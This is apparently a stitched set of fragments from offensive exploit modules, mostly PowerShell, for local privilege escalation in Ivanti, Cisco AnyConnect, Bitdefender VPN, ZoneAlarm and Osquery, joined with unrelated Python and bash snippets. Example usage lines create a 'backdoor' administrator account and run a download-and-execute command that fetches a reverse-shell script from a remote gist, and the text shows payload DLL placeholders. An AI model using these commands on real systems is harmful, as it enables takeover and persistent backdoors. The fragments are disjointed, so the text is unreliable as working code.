#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url = 'https://127.0.0.1/'
username = 'admin'
password = 'initial'

#!/bin/bash
trap cleanup INT
# Restore the original run-result-reader.sh from the backup copy, if one exists.
function cleanup()
{
    if [ -f /tmp/run-result-reader.sh ]
    then
        /usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
        /usr/bin/rm -f /tmp/run-result-reader.sh
    fi
}

<#
.Synopsis
This module can be used to invoke the Self-Elevation functionality of
Ivanti AppSense Application Manager
.Description
This module uses the AMShellIntegration.AMShellContextMenu COM component to
invoke the Self-Elevation functionality of Ivanti AppSense Application
Manager.
#>

# kill OneDrive if it's running
Get-Process -Name OneDrive -ErrorAction SilentlyContinue | Stop-Process -ErrorAction SilentlyContinue
# embedded 32-bit DLL that runs calc.exe
$EncodedCompressedFile = "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

# embedded 32-bit DLL that runs calc.exe
$EncodedCompressedFile = "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

<#
Example usage:
Import-Module .\Invoke-ExploitIVPNLPE.psd1
Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
#>
@{
    RootModule = 'Invoke-ExploitIVPNLPE.psm1'
    ModuleVersion = '1.0'
}

<#
.Synopsis
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows
.Description
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows.
When the -Command argument isn't provided, a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen.
Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges.
#>

<#
.Synopsis
Exploit module for Bitdefender VPN for Windows
.Parameter Command
Command(s) to be executed when openvpn.exe is started
.Example
Import-Module .\Invoke-ExploitBdVpnLpe.psm1
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
#>

<#
.Synopsis
This module exploits a vulnerability in the TrueVector Internet Monitor service of CheckPoint ZoneAlarm to gain elevated privileges
.Description
This module exploits a vulnerability in the TrueVector Internet Monitor service, which is installed as part of CheckPoint ZoneAlarm.
The affected service runs as LocalSystem and periodically creates a number of backup files within the ProgramData folder.
When these files are created, their file permissions are explicitly set to Full Control for Authenticated Users.
A local attacker can create a hardlink with the same name as the backup files, causing the permissions of another file to be changed.
#>

<#
.Synopsis
Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege
.Description
This module exploits a vulnerability in Osquery < 3.4.0.
It was found that Osquery is installed in %ProgramData%, which has weak file permissions.
A local user can exploit this issue to run arbitrary code with SYSTEM privileges.
https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html
#>